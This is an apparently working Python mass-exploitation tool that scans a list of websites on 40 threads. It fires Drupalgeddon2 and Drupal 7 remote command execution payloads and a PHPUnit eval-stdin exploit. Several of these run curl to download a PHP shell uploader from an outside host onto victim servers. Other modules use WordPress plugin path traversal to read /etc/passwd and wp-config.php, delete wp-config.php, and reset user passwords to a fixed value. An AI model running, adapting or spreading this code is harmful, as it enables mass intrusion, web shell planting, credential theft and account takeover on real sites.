tolol.py

1. import urllib3, requests, os, sys, re, json
2. from requests.packages.urllib3.exceptions import InsecureRequestWarning
3. import base64
4. import random
5. import string
6. requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
7. from multiprocessing.dummy import Pool as ThreadPool
8. from time import time as timer
9. from platform import system
10. from colorama import Fore
11. from colorama import Style
12. from pprint import pprint
13. from colorama import init
14. import urllib
15. from bs4 import BeautifulSoup
16.  
17.  
18. fr = Fore.RED
19. fc = Fore.CYAN
20. fw = Fore.WHITE
21. fg = Fore.GREEN
22. sd = Style.DIM
23. sn = Style.NORMAL
24. sb = Style.BRIGHT
25. try:
26. os.system('clear')
27. print ("""
28. ____ ___ ______ _____ ___
29. | \ / \ | T| T / _]
30. | o )Y Y| |l__/ | / [_
31. | T| O |l_j l_j| __jY _]
32. | O || | | | | / || [_
33. | |l ! | | | || T
34. l_____j \___/ l__j l_____jl_____j
35.  
36. > Dann Kowalskyi ~ Zekkel DeBleau ~ Family Attack Cyber <
37. """)
38. ganteng = input('ur files => ')
39. f= open(ganteng, 'r')
40. woh = f.read().splitlines()
41. except IOError:
42. pass
43. woh = list((woh))
44.  
45. def banner():
46. sd
47. print ("""
48. ____ ___ ______ _____ ___
49. | \ / \ | T| T / _]
50. | o )Y Y| |l__/ | / [_
51. | T| O |l_j l_j| __jY _]
52. | O || | | | | / || [_
53. | |l ! | | | || T
54. l_____j \___/ l__j l_____jl_____j
55.  
56. > Zekkel AR ~ Family Attack Cyber <
57. """)
58. def Domains(url):
59.  
60. if '://' not in url:
61. return "http://" + url
62. else:
63. return url
64.  
65. def timezone(site):
66. try:
67. url = Domains(site)
68. #cek uname
69. command = ('uname -a')
70. data1 = url+'/user/register?element_parents=timezone/timezone/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
71. data2 = {'form_id':'user_register_form','_drupal_ajax':'1','timezone[a][#lazy_builder][]':'passthru','timezone[a][#lazy_builder][][]':command}
72. ambush = requests.post(data1, data=data2, timeout=5).text
73.  
74. #cek home
75. command2 = ('curl https://raw.githubusercontent.com/Avinash-acid/Shell-Uploader/master/uploader.php -o sayang.php')
76. data3 = url+'/user/register?element_parents=timezone/timezone/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
77. data4 = {'form_id':'user_register_form','_drupal_ajax':'1','timezone[a][#lazy_builder][]':'passthru','timezone[a][#lazy_builder][][]':command2}
78. jembit = requests.post(data3, data=data4, timeout=5).text
79. kontoool = requests.get(url+'/sayang.php')
80.  
81. #cek default
82. command3 = ('curl https://raw.githubusercontent.com/Avinash-acid/Shell-Uploader/master/uploader.php > /sites/default/files/sayang.php')
83. data100 = url+'/user/register?element_parents=timezone/timezone/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
84. data200 = {'form_id':'user_register_form','_drupal_ajax':'1','timezone[a][#lazy_builder][]':'passthru','timezone[a][#lazy_builder][][]':command3}
85. pepek = requests.post(data100, data=data200, timeout=5)
86. kontiil = requests.get(url+'/sites/default/files/sayang.php')
87. if 'Linux' in ambush:
88. print('{}[ {}VULNERABLE {}] {} {}{} [ {}DRUPAL 8 {}] {}[ {}TIMEZONE {}] ' .format(fr,fc,fr,fg,url,fr,fc,fr,fr,fc,fr))
89. open('drupal_vuln.txt', 'a').write(url + "\n")
90. print(' {}[ {}+ {}] {}Exploiting....' .format(fr,fc,fr,fc))
91. if 'Avinash Kumar Thapa' in kontoool:
92. print(' [ + ] Exploit Success {}/sayang.php' .format(url))
93. open('drupal_vuln.txt', 'a').write(url+'/sayang.php')
94.  
95. else:
96. print(' {}[ {}+ {}] {}Exploit Failed, Home DIR RED' .format(fc,fr,fc,fr))
97. print(' {}[ {}i {}] {}Checking Dir Writable /sites/default/files' .format(fr,fc,fr,fc))
98. if 'Avinash Kumar Thapa' in kontiil:
99. print(' [ + ] Success {}/sites/default/files/sayang.php')
100. open('drupal_vuln.txt', 'a').write(url+'/sites/default/files/sayang.php')
101. else:
102. print(' {}[ {}+ {}] {}Exploit Failed ' .format(fc,fr,fc,fr))
103. open('drupal_vuln.txt', 'a').write(url + "\n")
104.  
105.  
106. else:
107. print('{}[ {}NOT VULNERABLE {}] {}{}' .format(fc,fr,fc,fg,url))
108. except requests.exceptions.ConnectTimeout:
109. print("{}[ {}NOT VULNERABLE {}] {}{} {}[{}CONNECTION TIMEOUT {}] " .format(fc,fr,fc,fg,url,fc,fr,fc))
110. except Exception as e:
111. print('{}[ {}NOT VULNERABLE {}] {}{} {}[ {}URL ERROR {}] ' .format(fc,fr,fc,fg,url,fc,fr,fc))
112. #DRUPALGEDDON MAIL
113. def mail(site):
114. try:
115. url = Domains(site)
116. command = ('uname -a')
117. url1 = url + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
118. payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'passthru', 'mail[#type]': 'markup', 'mail[#markup]':command}
119. ambush2 = requests.post(url1, data=payload, timeout=5).text
120. url2 = url + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
121. payload2 = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'passthru', 'mail[#type]': 'markup', 'mail[#markup]':'curl https://raw.githubusercontent.com/Avinash-acid/Shell-Uploader/master/uploader.php -o sayang.php'}
122. ambuz = requests.post(url2, data=payload2, timeout=5).text
123. bla = requests.get(url+'/sayang.php')
124. cekdir = url+'/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
125. hajar = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'passthru', 'mail[#type]': 'markup', 'mail[#markup]':'curl https://raw.githubusercontent.com/Avinash-acid/Shell-Uploader/master/uploader.php > /sites/default/files/sayang.php'}
126. kontill = url+'/sites/default/files/sayang.php'
127. if 'Linux' in ambush2:
128. print('{}[ {}VULNERABLE {}] {}{} {}[ {}DRUPAL 8 {}] {}[ {}MAIL {}] ' .format(fr,fc,fr,fg,url,fr,fc,fr,fr,fc,fr))
129. print(" {} [ {}+ {}] {}Exploiting ... " .format(fr,fc,fr,fc))
130. if 'Avinash Kumar Thapa' in bla:
131. print(" [ + ] Exploit Success ... ")
132. open('drupal_vuln.txt', 'a').write(url + "\n")
133.  
134. else:
135. print(' {} [ {}+ {}] {}Exploit Failed, Dir RED in home Directory' .format(fc,fr,fc,fg))
136. print(" [ + ] CHECKING In dir /sites/default/files")
137. if 'Avinash Kumar Thapa' in kontill:
138. print(' [ + ] Exploiting Success --> {}/sites/default/files/sayang.php')
139. open('drupal_vuln.txt', 'a').write(url+'/sites/default/files/sayang.php')
140.  
141. else:
142. print(' {}[ {}i {}] {}Exploiting Failed, No Writable Dir' .format(fc,fr,fc,fr))
143. open('drupal_vuln.txt', 'a').write(url + "\n")
144.  
145.  
146.  
147.  
148. else:
149. print('{}[ {}NOT VULNERABLE {}] {}{}' .format(fc,fr,fc,fg,url))
150. except requests.exceptions.ConnectTimeout:
151. print("{}[ {}NOT VULNERABLE {}] {}{} {}[{}CONNECTION TIMEOUT {}] " .format(fc,fr,fc,fg,url,fc,fr,fc))
152. except Exception as e:
153. print('{}[ {}NOT VULNERABLE {}] {}{} {}[ {}URL ERROR {}] ' .format(fc,fr,fc,fg,url,fc,fr,fc))
154. """
155. def drupal7(site):
156. url = Domains(site)
157. verify = False
158. header = headers = {'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'}
159. payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'passthru', 'mail[#type]': 'markup', 'mail[#markup]': 'uname -a'}
160. url2 = (url + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax')
161. ea = requests.post(url2, data=payload, headers = header, verify=verify, timeout=5).text
162.  
163. try:
164. if 'Linux' in ea:
165. print("{}{} --> {} vuln[{}] --> drupal7" .format(fg,url,fc,ea))
166. print("[ + ] Exploiting ....")
167. kampank = (url)
168. open('drupal_vuln.txt', 'a').write(url + "\n")
169.  
170. else:
171. print("{}{} --> {} not vuln" .format(fg,url,fr))
172. except requests.exceptions.ConnectTimeout:
173. print("[ i ] {}{} CONNECTION TIMEOUT" .format(fw,url))
174. except Exception as e:
175. #print (e)
176. print ("{} Something was wrong !" .format(url))
177. """
178.  
179. def upshell(site):
180. url = Domains(site)
181. print(" [ + ] Exploiting ...")
182. kentot2 = (url+'?q=user/password&name[%23post_render][]=system&name[%23markup]=curl https://raw.githubusercontent.com/Avinash-acid/Shell-Uploader/master/uploader.php -o sayang.php&name[%23type]=markup')
183. data6 = {
184. 'form_id':'user_pass',
185. '_triggering_element_name':'name'
186. }
187. re2 = requests.post(kentot2,data = data6,verify = False,timeout = 5)
188. result2 = re.search(r'<input type="hidden" name="form_build_id" value="([^"]+)" />', re2.text)
189. if result2:
190. found3 = result2.group(1)
191. url23 = url+'?q=file/ajax/name/%23value/'+found3
192. data1 = {'form_build_id' : found3}
193. babi = requests.post(url23, data=data1, verify = False, timeout=5)
194. cek = requests.get(url+'/sayang.php').text
195. if 'Avinash Kumar Thapa' in cek:
196. print("{} [ + ] Exploit Success --> {}/sayang.php" .format(fg,url))
197. else:
198. print('{} [ + ] Exploiting Failed --> {}{}' .format(fg,fr,url))
199. else:
200. print('{}[ {}NOT VULNERABLE {}] {}{}' .format(fc,fr,fc,fg,url))
201.  
202. def writable(site):
203. try:
204. url = Domains(site)
205. print(' {}[ + ] Checking Dir Writable' .format(fg))
206. pass
207. kentot2 = (url+'?q=user/password&name[%23post_render][]=system&name[%23markup]=curl https://raw.githubusercontent.com/Avinash-acid/Shell-Uploader/master/uploader.php > /sites/default/files/sayang.php&name[%23type]=markup')
208. data6 = {
209. 'form_id':'user_pass',
210. '_triggering_element_name':'name'
211. }
212. re2 = requests.post(kentot2,data = data6,verify = False,timeout = 5)
213. result2 = re.search(r'<input type="hidden" name="form_build_id" value="([^"]+)" />', re2.text)
214. if result2:
215. found3 = result2.group(1)
216. url23 = url+'?q=file/ajax/name/%23value/'+found3
217. data1 = {'form_build_id' : found3}
218. babi = requests.post(url23, data=data1, verify = False, timeout=5)
219. cek = requests.get(url+'/sites/default/files/sayang.php').text
220. if 'Avinash Kumar Thapa' in cek:
221. print("{} [ + ] Exploit Success --> {}/sayang.php" .format(fg,url))
222. else:
223. print('{} [ + ] Exploiting Failed, No Dir Writable--> {}' .format(fg,url))
224. else:
225. print('{}[ {}NOT VULNERABLE {}] {}{}' .format(fc,fr,fc,fg,url))
226. except requests.exceptions.ConnectTimeout:
227. print("{}[ {}NOT VULNERABLE {}] {}{} {}[{}CONNECTION TIMEOUT {}] " .format(fc,fr,fc,fg,url,fc,fr,fc))
228. except Exception as e:
229. print('{}[ {}NOT VULNERABLE {}] {}{} {}[ {}URL ERROR {}] ' .format(fc,fr,fc,fg,url,fc,fr,fc))
230. def drupal7_1(site):
231. try:
232. url = Domains(site)
233. kentot = (url+'?q=user/password&name[%23post_render][]=system&name[%23markup]=uname -a&name[%23type]=markup')
234. data = {
235. 'form_id':'user_pass',
236. '_triggering_element_name':'name'
237. }
238. r = requests.post(kentot,data = data,verify = False,timeout = 5)
239. result = re.search(r'<input type="hidden" name="form_build_id" value="([^"]+)" />', r.text)
240. if result:
241. found = result.group(1)
242. url2= url + '?q=file/ajax/name/%23value/'+found
243. data = {'form_build_id' : found}
244. r = requests.post(url2,data = data,verify = False,timeout = 5).text
245. kentot2 = (url+'?q=user/password&name[%23post_render][]=system&name[%23markup]=curl https://raw.githubusercontent.com/Avinash-acid/Shell-Uploader/master/uploader.php > /sites/default/files/sayang.php&name[%23type]=markup')
246. data6 = {
247. 'form_id':'user_pass',
248. '_triggering_element_name':'name'
249. }
250. re2 = requests.post(kentot2,data = data6,verify = False,timeout = 5)
251. result2 = re.search(r'<input type="hidden" name="form_build_id" value="([^"]+)" />', re2.text)
252. if result2:
253. found3 = result2.group(1)
254. url23 = url+'?q=file/ajax/name/%23value/'+found3
255. data1 = {'form_build_id' : found3}
256. babi = requests.post(url23, data=data1, verify = False, timeout=5)
257. cek = requests.get(url+'/sites/default/files/sayang.php').text
258. else:
259. pass
260. kentot3 = (url+'?q=user/password&name[%23post_render][]=system&name[%23markup]=curl https://raw.githubusercontent.com/Avinash-acid/Shell-Uploader/master/uploader.php -o sayang.php&name[%23type]=markup')
261. data7 = {
262. 'form_id':'user_pass',
263. '_triggering_element_name':'name'
264. }
265. re3 = requests.post(kentot3,data = data7,verify = False,timeout = 5)
266. result3 = re.search(r'<input type="hidden" name="form_build_id" value="([^"]+)" />', re3.text)
267. if result3:
268. found4 = result3.group(1)
269. url234 = url+'?q=file/ajax/name/%23value/'+found4
270. data2 = {'form_build_id' : found4}
271. babi = requests.post(url234, data=data2, verify = False, timeout=5)
272. cek1 = requests.get(url+'/sayang.php').text
273. else:
274. pass
275.  
276. if 'Linux' in r:
277. print("{}[ {}VULNERABLE {}] {}{} {}[ {}DRUPAL 7 {}]" .format(fr,fc,fr,fg,url,fr,fc,fr))
278. print(" {} [ {}+ {}] {}Exploiting" .format(fr,fc,fr,fc))
279. if 'Avinash Kumar Thapa' in cek:
280. print("{} [ + ] Exploit Success --> {}/sites/default/files/sayang.php" .format(fg,url))
281. open('drupal_vuln.txt', 'a').write(url+'/sites/default/files/sayang.php'+"\n")
282.  
283. else:
284. print('{} [ {}+ {}] {}Exploiting Failed, {}[ {}NO DIR WRITABLE {}]' .format(fc,fr,fc,fc,fc,fr,fc))
285. print("{} [ i ] Checking in Home Directory.." .format(fg))
286. if 'Avinash Kumar Thapa' in cek1:
287. print("{} [ + ] Exploit Success --> {}/sayang.php" .format(fc, url))
288. open('drupal_vuln.txt', 'a').write(url+'/sayang.php'+"\n")
289.  
290. else:
291. print("{} [ + ] Exploit Failed DIR RED " .format(fr))
292. open('drupal_vuln.txt', 'a').write(url+"\n")
293. # upshell(url)
294.  
295. #writable(url)
296.  
297. else:
298. print('{}[ {}NOT VULNERABLE {}] {}{}' .format(fc,fr,fc,fg,url))
299. else:
300. print('{}[ {}NOT VULNERABLE {}] {}{}' .format(fc,fr,fc,fg,url))
301. except requests.exceptions.ConnectTimeout:
302. print("{}[ {}NOT VULNERABLE {}] {}{} {}[{}CONNECTION TIMEOUT {}] " .format(fc,fr,fc,fg,url,fc,fr,fc))
303. except Exception as e:
304. print('{}[ {}NOT VULNERABLE {}] {}{} {}[ {}URL ERROR {}] ' .format(fc,fr,fc,fg,url,fc,fr,fc))
305. #print("{}[ i ] {}{} --> URL ERROR" .format(fw,fw,url))
306.  
307.  
308. def enum(site):
309.  
310. try:
311. url = Domains(site)
312. for i in range(5):
313. enum = urllib.parse.urlencode({'cs_uid': i, 'action': 'cs_employer_ajax_profile'})
314. data = requests.post(url + "/wp-admin/admin-ajax.php", data=enum, headers=headers, verify=False, timeout=3)
315. login = re.findall(r'name="display_name" value=\"(.*?)\"',str(data.content))
316. for user in login:
317. return user
318.  
319. except requests.exceptions.ConnectTimeout:
320. print("{}[ {}NOT VULNERABLE {}] {}{} {}[{}CONNECTION TIMEOUT {}] " .format(fc,fr,fc,fg,url,fc,fr,fc))
321. except Exception as e:
322. print('{}[ {}NOT VULNERABLE {}] {}{} {}[ {}URL ERROR {}] ' .format(fc,fr,fc,fg,url,fc,fr,fc))
323.  
324. def wp_spritz(site):
325. try:
326. url = Domains(site)
327. exploit = "/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd"
328. blank = requests.get(url+exploit, timeout=5)
329. if blank.status_code == 200:
330. print ("[ + ] STATUS CODE 200OK... EXPLOITING")
331. if 'root:x:0:0:root:/root:/bin/bash' in blank.text:
332. print("{}[ {}VULNERABLE {}] {}{} {}[ {}WP SPRITZ {}]" .format(fr,fc,fr,fg,url,fr,fc,fr))
333. open('wp_spritz', 'a').write(url + exploit + "\n")
334. else:
335. print ("{}[ + ] EXPLOITING FAILED" .format(fc))
336.  
337. else:
338. print('{}[ {}NOT VULNERABLE {}] {}{}' .format(fc,fr,fc,fg,url))
339. except requests.exceptions.ConnectTimeout:
340. print("{}[ {}NOT VULNERABLE {}] {}{} {}[{}CONNECTION TIMEOUT {}] " .format(fc,fr,fc,fg,url,fc,fr,fc))
341. except Exception as e:
342. print('{}[ {}NOT VULNERABLE {}] {}{} {}[ {}URL ERROR {}] ' .format(fc,fr,fc,fg,url,fc,fr,fc))
343.  
344. def ad_manager(site):
345. try:
346. url = Domains(site)
347. exploit = '/wordpress/wp-admin/edit.php?post_type=wd_ads_ads&export=export_csv&path=../wp-config.php'
348. blank = requests.get(url+exploit, timeout=5).text
349. if 'DB_NAME' in blank:
350. print("{}[ {}VULNERABLE {}] {}{} {}[ {}AD MANAGER {}]" .format(fr,fc,fr,fg,url,fr,fc,fr))
351. open('ad_manager.txt', 'a').write(url + exploit + "\n")
352. else:
353. print('{}[ {}NOT VULNERABLE {}] {}{}' .format(fc,fr,fc,fg,url))
354. except requests.exceptions.ConnectTimeout:
355. print("{}[ {}NOT VULNERABLE {}] {}{} {}[{}CONNECTION TIMEOUT {}] " .format(fc,fr,fc,fg,url,fc,fr,fc))
356. except Exception as e:
357. print('{}[ {}NOT VULNERABLE {}] {}{} {}[ {}URL ERROR {}] ' .format(fc,fr,fc,fg,url,fc,fr,fc))
358.  
359.  
360.  
361.  
362. def backup(site):
363. try:
364. url = Domains(site)
365. exploit = '/wp-content/themes/CherryFramework/admin/data_management/download_backup.php '
366. blank = requests.get(url+exploit, stream=True)
367. if blank.status_code == 200:
368. print("{}[ {}VULNERABLE {}] {}{} {}[ {}BACKUP {}]" .format(fr,fc,fr,fg,url,fr,fc,fr))
369. tai = input('name file => ')
370. print ("{}{} Downloading File...." .format(url))
371. with open(tai + '.mp3','wb') as f:
372. for i in r.iter_content(1024):
373. if i:
374. f.write(i)
375. f.flush
376. else:
377. print('{}[ {}NOT VULNERABLE {}] {}{}' .format(fc,fr,fc,fg,url))
378. except requests.exceptions.ConnectTimeout:
379. print("{}[ {}NOT VULNERABLE {}] {}{} {}[{}CONNECTION TIMEOUT {}] " .format(fc,fr,fc,fg,url,fc,fr,fc))
380. except Exception as e:
381. print('{}[ {}NOT VULNERABLE {}] {}{} {}[ {}URL ERROR {}] ' .format(fc,fr,fc,fg,url,fc,fr,fc))
382.  
383.  
384. def wp_reset(site):
385.  
386. try:
387.  
388. url = Domains(site)
389.  
390. login = enum(site)
391.  
392. pw = "rdcl@hxr000"
393.  
394. reset = urllib.parse.urlencode({'new_pass': pw, 'confirm_new_pass': pw, 'user_login': login, 'action': 'cs_reset_pass'})
395. data = requests.post(url + "/wp-admin/admin-ajax.php", data=reset, headers=headers, verify=False, timeout=3)
396.  
397. res = re.findall(r'<i class=\"(.*?)\"',str(data.content))
398. for i in res:
399. if i == str('icon-checkmark6') and data.status_code == 200:
400. print("{}[ {}VULNERABLE {}] {}{} {}[ {}WP RESET {}]" .format(fr,fc,fr,fg,url,fr,fc,fr))
401. open('reset_success.txt', 'a').write(url + "|" + login + "|" + pw + "\n")
402. else:
403. print('{}[ {}NOT VULNERABLE {}] {}{}' .format(fc,fr,fc,fg,url))
404.  
405. except requests.exceptions.ConnectTimeout:
406. print("{}[ {}NOT VULNERABLE {}] {}{} {}[{}CONNECTION TIMEOUT {}] " .format(fc,fr,fc,fg,url,fc,fr,fc))
407. except Exception as e:
408. print('{}[ {}NOT VULNERABLE {}] {}{} {}[ {}URL ERROR {}] ' .format(fc,fr,fc,fg,url,fc,fr,fc))
409.  
410.  
411. def Arforms_config(site):
412.  
413. try:
414.  
415. url = Domains(site)
416.  
417. payload = {
418. "action":"arf_delete_file",
419. "file_name":"../../../../wp-config.php"
420. }
421.  
422. r = requests.post(url + "/wp-admin/admin-ajax.php", data=payload, headers=headers, timeout=3)
423.  
424. sh = requests.get(url + "/wp-admin").text
425. if 'id="setup" method="post" action="?step=0' in sh:
426. print("{}[ {}VULNERABLE {}] {}{} {}[ {}ARFORMS CONFIG {}]" .format(fr,fc,fr,fg,url,fr,fc,fr))
427. open('arforms_del.txt', 'a').write(url + "\n")
428. else:
429. print('{}[ {}NOT VULNERABLE {}] {}{}' .format(fc,fr,fc,fg,url))
430. except requests.exceptions.ConnectTimeout:
431. print("{}[ {}NOT VULNERABLE {}] {}{} {}[{}CONNECTION TIMEOUT {}] " .format(fc,fr,fc,fg,url,fc,fr,fc))
432. except Exception as e:
433. print('{}[ {}NOT VULNERABLE {}] {}{} {}[ {}URL ERROR {}] ' .format(fc,fr,fc,fg,url,fc,fr,fc))
434.  
435. def wp_install(site):
436.  
437. try:
438. url = Domains(site)
439.  
440. list_path = ['/','/new', '/wp', '/wordpress']
441.  
442. for path in list_path:
443. check = requests.get(url + path + "/wp-admin/setup-config.php" ,headers=headers, timeout=3).text
444. if '<a href="setup-config.php?step=1' in check:
445. print("{}[ {}VULNERABLE {}] {}{} {}[ {}WP INSTALL{}]" .format(fr,fc,fr,fg,url,fr,fc,fr))
446. open('wp_install.txt', 'a').write(url + path + "/wp-admin/setup-config.php" + "\n")
447. else:
448. print('{}[ {}NOT VULNERABLE {}] {}{}' .format(fc,fr,fc,fg,url))
449. except requests.exceptions.ConnectTimeout:
450. print("{}[ {}NOT VULNERABLE {}] {}{} {}[{}CONNECTION TIMEOUT {}] " .format(fc,fr,fc,fg,url,fc,fr,fc))
451. except Exception as e:
452. print('{}[ {}NOT VULNERABLE {}] {}{} {}[ {}URL ERROR {}] ' .format(fc,fr,fc,fg,url,fc,fr,fc))
453. def phpunit(site):
454. try:
455. url = Domains(site)
456. op = url+'/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'
457. cekos = "<?php system('uname -a');?>"
458. upshell = '<?php system("curl https://raw.githubusercontent.com/Avinash-acid/Shell-Uploader/master/uploader.php -o muach.php"); ?>'
459. b = requests.post(op, data=cekos, timeout=5).text
460. t = url+'/vendor/phpunit/phpunit/src/Util/PHP/muach.php'
461. da=requests.post(url, data=upshell, timeout=5)
462. bbb = requests.get(t).text
463. if 'Linux' in b:
464. print('{}[ {}VULNERABLE {}]{} {} {}[ {}LARAVEL {}] ' .format(fr,fc,fr,fg,url,fr,fc,fr))
465. print(' {}[ {}+ {}] {}Exploiting...' .format(fr,fc,fr,fc))
466. if 'Avinash Kumar Thapa' in bbb:
467. print('{}[{}+{}]{}{} [ {}SUCCESS {}]{}[{}LARAVEL{}]' .format(fr,fc,fr,fg,url,fc,fg,fc,fg,fc))
468. open('php_unit.txt', 'a').write(url + "\n")
469.  
470. else:
471. print('{} [ {}- {}] {}Exploit Failed' .format(fc,fr,fc,fr))
472. else:
473. print('{}[ {}NOT VULNERABLE {}] {}{}' .format(fc,fr,fc,fg,url))
474. except requests.exceptions.ConnectTimeout:
475. print("{}[ {}NOT VULNERABLE {}] {}{} {}[{}CONNECTION TIMEOUT {}] " .format(fc,fr,fc,fg,url,fc,fr,fc))
476. except Exception as e:
477. print('{}[ {}NOT VULNERABLE {}] {}{} {}[ {}URL ERROR {}] ' .format(fc,fr,fc,fg,url,fc,fr,fc))
478.  
479. def wordpress_cubed(site):
480. url = Domains(site)
481.  
482.  
483. def Run_Work(site):
484. url = Domains(site)
485. drupal7_1(url)
486. phpunit(url)
487. mail(url)
488. timezone(url)
489.  
490. wp_spritz(url)
491. ad_manager(url)
492. backup(url)
493. wp_reset(url)
494. Arforms_config(url)
495. wp_install(url)
496.  
497. os.system('clear')
498. def Main():
499.  
500.  
501. start = timer()
502. pp = ThreadPool(40)
503. pr = pp.map(Run_Work, woh)
504. print('Time: ' + str(timer() - start) + ' seconds')
505.  
506.  
507. if __name__ == "__main__":
508. Main()
509. """
510. if 'Linux' in ambush:
511. print("{} --> vuln" .format(kontil))
512. else:
513. print("{} --> Not Vuln" .format(kontil))
514. """